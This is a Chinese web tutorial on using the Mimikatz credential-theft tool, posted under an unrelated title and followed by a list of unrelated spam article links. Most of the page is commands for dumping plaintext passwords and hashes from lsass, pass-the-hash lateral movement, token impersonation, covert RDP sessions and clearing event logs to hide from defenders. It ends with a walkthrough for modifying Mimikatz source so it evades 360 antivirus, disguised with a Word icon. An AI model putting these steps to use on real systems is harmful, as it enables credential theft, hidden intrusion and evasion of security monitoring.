360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 主板检测卡代码,电脑主板检测代码73

    电脑主板诊断卡主要是为电脑故障生成出来的,电脑主板诊断卡也就成为了计算机维修人员经常使用的工具,也有一些骨灰级玩家会使用该工具测试计算机硬件的东西。 主板故障诊断卡,是利用主板中BIOS内部自检程序的检测结果,通过代码一一显示出来,结合代码含义速查表就能很快地知道电脑故障所在。尤其在PC机不能引导操作系统、黑屏、喇叭不叫时,使用本卡更能体现其便利,使您事半功…

    2023-06-30
  • 内衣一线品牌有哪些,一线品牌内衣十大排名

    《内衣一线品牌有哪些?》 内衣作为女性日常生活中不可或缺的服饰之一,其品牌的选择对于女性来说尤为重要。 那么,内衣一线品牌有哪些呢?接下来,我将为大家详细介绍一些较为知名的内衣一线品牌。 一、华歌尔(Wacoal) 华歌尔可能是许多人心中的内衣一线品牌之一。 它以高品质的面料和精湛的工艺著称,无论是文胸的剪裁还是内裤的舒适度,都做得相当不错。 我觉得华歌尔的…

    用户投稿 2025-05-15
  • 淘宝分销平台官网,淘宝分销平台

    《淘宝分销平台官网:深入探秘与运营之道》 一、淘宝分销平台官网的概述 淘宝分销平台官网可能是众多淘宝卖家和分销商眼中的重要阵地。 它就像是一个巨大的商业舞台,连接着品牌商、供应商和众多的分销渠道。 在这里,卖家可以轻松找到各种优质的商品,进行分销销售,而供应商则可以将自己的产品推广给更广泛的客户群体。 我觉得淘宝分销平台官网就像是一个大型的商品超市,里面摆满…

    用户投稿 2025-03-20
  • 理塘海子山海拔多少米,理塘到海子山多少公里

    一路向西,越过天路十八弯,翻过卡子拉山,进入理塘,省道S217沿无量河逶迤南行,悠悠的无量河温驯而安静地向前流动,像给无际的草原系上了一条长长的亮亮的银色哈达,河水滋润着理塘肥美壮阔的草原,山青水秀草地如毯,各色的野花遍地开放,这么美的地方,岂能辜负人杰地灵之说?所以,上苍就曾在这里,撒下过一颗多情的明珠。这里,是仓央嘉措的故乡。 从小就背“天苍苍,野茫茫,…

    2023-07-12 用户投稿
  • 战争机器2pc,国民党冲锋时吹的什么

    尽管世界上的战争机器一直以其愚昧、落后的领土观念而闻名,但它们却面临着不断的压力,要时刻与时代保持同步。如果它们不能做到,就会输掉战争。至少在理论上是这样。但在实践中,并不总是如此。这些来自遥远过去的十种武器都曾在现代战场上投入使用,有时甚至获得了胜利。 10.剑(2020) 在也门,经常可以看到男人们佩戴剑,其中很多剑都是民间战争时代用街上的碎片锻造而成的…

    2023-07-10 用户投稿
  • 亿起发联盟,亿起发联盟:获得更多机会和成功

    近来,关于人民币国际化的话题成为许多媒体关注的焦点。随着中国经济实力稳步提升、在全球产业链供应链中的地位不断上升、在全球经济治理中发挥的作用持续加大,人民币的国际储备货币、支付货币等功能不断增强,越来越多的国家开始积极推动与中国进行相关货币安排。 与此同时,当前以美元为主导的国际货币体系内在缺陷和系统性风险不断凸显,更多国家寻求建立多元化的国际货币体系,去美…

    2023-05-22
  • 康熙先生综艺罗云熙在线观看,罗云熙魔熙先生第一季

    抱着好奇的心态点进了罗云熙的微综艺,本来想着是冲着罗云熙的盛世美颜去的,没相到竟然被节目浓浓的城市感所吸引。   要知道这类明星微综艺大多都是以这个人为主,或讲述日常生活,或发生了哪些好玩的事,《魔熙先生+》却做到了将城市感放在前面,罗云熙作为归乡人中的一员,通过他的视角展现着成都这座城市的岁月变迁。   罗云熙回到阔别许久的旧家时的样子…

    2023-07-04 用户投稿
  • 什么叫无线网卡,随身wifi好用还是无线网卡好用

    如今,随着互联网的普及和移动设备的广泛使用,人们对于便捷的网络接入方式的需求不断增加。其中,随身WiFi成为了越来越多人的选择。相比手机热点,随身WiFi可以为电脑、平板等多个设备提供稳定的网络信号,而且不需要借助手机或路由器等其他设备。但是,在购买随身WiFi之前,很多人会对它和无线网卡产生混淆,不知道该如何选择。 我们先来了解一下它们的工作原理:无线网卡…

    2023-07-01
  • 10w以内的车(10万以内汽车排行榜前十名)

    1、丰田雷凌 名称:丰田雷凌 价格:14.98-21.98万元 优点:动力充沛、操控稳定、油耗低、安全性能好、内饰豪华、空间宽敞。 缺点:底盘较硬、噪音较大、后排中间座位不够舒适。 2、大众宝来 名称:大众宝来 价格:11.99-18.49万元 优点:操控稳定、油耗低、动力充沛、内饰豪华、空间宽敞、后排座椅舒适。 缺点:外观较为普通、噪音较大、后排中央凸起。…

    2023-05-27
  • 游戏工作室怎么赚钱(游戏搬砖赚钱的游戏)

    天涯明月刀手游,腾讯游戏北极光工作室群出品,由端游原班团队打造的武侠IP力作。以行业领先的高品质美术效果,打造一个海阔天空的开放世界,还原北宋年间的国风盛世,端游画风剧情完美移植。   该游戏不支持自由交易,从2020年10月16日公测开服进驻,到现在为止,有3个月的时间了,可以说天刀手游想赚钱还是很麻烦的,但是也不是完全不可以,下面就如何赚钱做个…

    2021-11-02
  • 电脑卡在光标界面,鼠标的光标突然没有了

    电脑办公已经非常普遍,如果电脑相关零配件出现问题是很让人头疼的,比如今天小员要说到的鼠标的光标在电脑上不显示了,是什么原因呢?一起来看看吧~ 对鼠标的故障进行分析与维修通常来说都比较可以简单,大多数故障为接口或按键接触不良、断线、机械定位系统脏污。   很少会出现鼠标内部控制元器件或电路虚焊的情况发生,这种问题主要存在于某些劣质产品中,其中以发光二…

    2023-07-07
  • 土著居民是什么意思(印度的土著居民)

    在我们的印象中,印度人的肤色那么黑,怎么也和白种人联系不到一起,有人还以为印度人是黑种人呢,但根据人种划分学、世界语系分类和古代历史来看,印度人很有可能属于白种的雅利安人。 一、雅利安人,一个传说中的民族。 1、雅利安人,英译Aryan,在梵语中,arya(雅利安)的意思是“高贵”、“纯洁”,这是一个被认为是史前世界最优秀的民族之一,传说他们是亚特兰蒂斯的后…

    2022-05-05 用户投稿